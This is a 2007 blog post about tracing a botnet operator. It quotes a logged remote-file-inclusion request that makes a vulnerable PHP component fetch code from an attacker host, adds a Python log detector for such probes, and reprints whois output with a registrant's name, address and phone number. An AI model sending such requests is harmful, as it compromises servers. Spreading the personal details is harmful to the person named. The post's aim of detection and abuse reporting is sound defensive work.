A talk with a Botnet script kiddie
2007/01/23 filed under /web
As mentioned before, I've been obsessed with stopping botnets. Well, this one is operated by a script kiddie named "fazanul".
Today I've seen his attack on my machine again. And, after sending the usual abuse emails, I've decided to have a little chat with him. As I feared, this is the ultimate script kiddie. But first, a little about his latest "attack".
The attack this time was launched using a new host:
GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://fazanul.com/c.txt? HTTP/1.1
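The request above is the whole signature of this kind of attack: a query parameter (here mosConfig_absolute_path) whose value is a URL on a host the attacker controls, which the vulnerable script then fetches and includes. As an added example, not code from the original post, here is a small Python detector that pulls such requests out of combined-format access log lines and lists the hosts serving the payloads, which is exactly the input a whois lookup and an abuse report need. The log lines are constructed; only the request path and fazanul.com come from the post, and the client IPs and 192.0.2.55 are documentation addresses.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log line, matched up to the response size; referer
# and user agent are left in the trailing part. This regex is my own, not a
# tool's.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value starting with one of these points at a remote resource:
# the signature of a PHP remote-file-inclusion probe like the one in the post.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def find_rfi_attempts(lines):
    """Return one finding per log line whose query string carries a remote
    URL as a parameter value. Each finding records the client, the script
    that was hit, the abused parameter and the host serving the payload."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if not value.lower().startswith(REMOTE_SCHEMES):
                continue
            findings.append({
                "client": m.group("ip"),
                "time": m.group("ts"),
                "path": parts.path,
                "param": name,
                "payload_url": value,
                "payload_host": urlsplit(value).hostname,
            })
    return findings


def payload_hosts(findings):
    """Distinct hosts serving payloads, sorted: the names to run through
    whois and to report to the hosting provider's abuse desk."""
    return sorted({f["payload_host"] for f in findings if f["payload_host"]})


# Constructed sample log. Only the request path and fazanul.com come from the
# post; the client IPs and 192.0.2.55 are documentation addresses.
SAMPLE_LOG = [
    '198.51.100.23 - - [23/Jan/2007:10:12:01 +0100] '
    '"GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php'
    '?mosConfig_absolute_path=http://fazanul.com/c.txt? HTTP/1.1" 404 287 "-" "-"',
    '203.0.113.7 - - [23/Jan/2007:10:13:44 +0100] '
    '"GET /index.php?option=com_content&id=12 HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.7 - - [23/Jan/2007:10:14:02 +0100] '
    '"GET /login.php?return=/admin/ HTTP/1.1" 200 900 "-" "-"',
    '198.51.100.23 - - [23/Jan/2007:10:20:17 +0100] '
    '"GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php'
    '?mosConfig_absolute_path=http://192.0.2.55/c.txt? HTTP/1.1" 404 287 "-" "-"',
]

if __name__ == "__main__":
    hits = find_rfi_attempts(SAMPLE_LOG)
    for f in hits:
        print(f"{f['time']} {f['client']} hit {f['path']} "
              f"via {f['param']} fetching {f['payload_url']}")
    print("hosts to look up and report:", ", ".join(payload_hosts(hits)))
```

The check is deliberately broad: any parameter carrying an absolute URL is flagged, so a site with legitimate redirect or feed parameters needs an allowlist of those parameter names, or the match restricted to the scripts known to be vulnerable. The payload host, not the client IP, is what the whois lookup and abuse report go after; the client is usually just another infected drone.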
Fazanul.com? Interesting! This kiddie was stupid enough to register a domain. He's, however, still abusing the Savant2 hole. So who's behind fazanul.com?
$ gwhois fazanul.com
[...]
Domain Name.......... fazanul.com
Creation Date........ 2007-01-23
Registration Date.... 2007-01-23
Expiry Date.......... 2008-01-23
Organisation Name.... Stanley Livingston
Organisation Address. 455 Rose Quartz Place
Organisation Address.
Organisation Address. Castle Rock
Organisation Address. 80108
Organisation Address. CO
Organisation Address. UNITED STATES
Admin Name........... Stanley Livingston
Admin Address........ 455 Rose Quartz Place
Admin Address........
Admin Address........ Castle Rock
Admin Address........ 80108
Admin Address........ CO
Admin Address........ UNITED STATES
Admin Email.......... fazanul5004@yahoo.com
Admin Phone.......... +1.9094813680
Admin Fax............
Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax.............
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com
You've got to be kidding me! He registered it today! And look at that, we have fazanul5004@yahoo.com, and it looks like Yahoo is hosting this domain.
$ host fazanul.com
fazanul.com has address 68.142.212.125
fazanul.com has address 68.142.212.126
fazanul.com has address 68.142.212.127
fazanul.com has address 68.142.212.128
fazanul.com has address 68.142.212.129
fazanul.com has address 68.142.212.130
fazanul.com mail is handled by 20 mx1.biz.mail.yahoo.com.
fazanul.com mail is handled by 30 mx5.biz.mail.yahoo.com.
Ugh, yeah, the files are even hosted by Yahoo (the IPs belong to Yahoo). So those should be gone within 48 hours ;-)
So, now that we've found his domain, let's have a little chat with him. He chose Bucharest.RO.EU.Ultra-Chat.Org again as command center, though this time the channel is #out. Let's log in, and why not use the nickname Sorin (remember? ;-)
Here's what happened... enjoy (the comments between the chat lines, shown in red on the original page, were added by me later)
<Sorin> Fazanul!
<Sorin> You're back :-)
<Sorin> Let's see how long fazanul.com will last
<fazanul> ??
<fazanul> what?
<Sorin> I've killed your MUIE botnet before ... and another one after that I believe ...
<Sorin> let's see how long it'll take to kill this botnet
<Sorin> But ermm, registering your domain @ yahoo?!? Are you crazy man?
<fazanul> nop
<fazanul> haking host
<Sorin> Ok ... well, let's see how long these drones here will last
<Sorin> Oh you now hack domain registry servers?
<fazanul> yeah
<Sorin> Ah ok ... somehow I have a hard time believing you. Your botnet Perl scripts look like crappy cut'n'paste jobs, not showing too much knowledge and full of script kiddie fingerprints ...
<fazanul> i have haking host and redirect and domains
<Sorin> fazanul.com has address 68.142.212.128
<fazanul> domains by yahooo
<Sorin> The whois points to yahoo, the IP points to yahoo ... so you hack Yahoo's Domain Registry service. Sweet
<fazanul> lollll
Yeah right ... he's registering domains through Yahoo himself now?
<Sorin> anyways, let's see how long it'll be up.
<fazanul> ok man
<fazanul> part
<fazanul> by channels
<fazanul> i have work
<Sorin> Can't you ban me? Like usually? ;-)
<fazanul> nop
<fazanul> part you
<Sorin> Oh well, will see your next "attack" ... and remember I'll stop those too ;-P
<Sorin> #muie is awfully empty ...
<fazanul> yeah
<fazanul> stop
Did he just ask me to *stop* attacking his botnets?!?
<Sorin> Why? You attack my machine, I attack you. Too bad I'm a little more successful
<fazanul> what machine you?
<Sorin> Oh come on ... I won't tell you. That's spoiling the fun. I don't know your next move, you don't know my host
<fazanul> ntroduction
<fazanul> E-mail for several domains are handled by mail.b10m.net <212.238.141.98>, most likely the domain you've tried to reach too.
[snipped more info from mail.b10m.net here]
I logged in to the IRC channel from this machine (mail.b10m.net). He was clever enough to look that up. Unfortunately for him, the attacks are *not* launched on this vhost ;-)
Anyways, now we know *his* IP address:
212.138.64.171 - - [22/Jan/2007:23:36:54 +0100] "GET / HTTP/1.0" 200 3240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9"
<fazanul> ....
<fazanul> understand
<Sorin> Oh, you got me there.
<Sorin> Darn it
<fazanul> -mail for several domains are handled by mail.b10m.net <212.238.141.98>
<fazanul> :))))
<fazanul> hashahahahaha
Funny, he actually pointed out a typo to me. That IP address *used* to be my IP address. Nowadays I have 217.19.21.103...
<Sorin> Ah yes ... oh well, I talk to you later then
<fazanul> to believe
<Sorin> You're too smart for me
<fazanul> :))))))))
SignOff: Sorin (fazanul ... the ultimate script kiddie)
Let's see how long this new botnet will last ... and let's see when I will meet my buddy fazaNULL again :-)
Update (2007/01/24): poor, poor fazanul. I received a canned reply from Yahoo abuse, in which they really shared my pain of receiving spam, but the message really didn't originate at a Yahoo mail server (what message again?). Still, they did act on this domain:
$ HEAD http://fazanul.com/c.txt
503 Service Temporarily Unavailable
[...]
X-Host: p10w8.geo.mud.yahoo.com
X-INKT-SITE: http://us.geocities.com/server-errors
X-INKT-URI: http://us.geocities.com/server-errors/pd_disabled.html
And sure enough, http://fazanul.com/ is pretty obvious:
Site Temporarily Disabled
This site has been temporarily disabled. If you are the owner of the site, please contact customer care.
Mission accomplished ... again ;-)
Trackbacks
"Security Ripcord" mentioned this post in "Interview with B10m":
As I stated in a previous post, I have been paying a little more attention to the information provided in URI and Refer sections provided by one of my Wordpress plugins. This information has, at times, contained information about some systems on the I...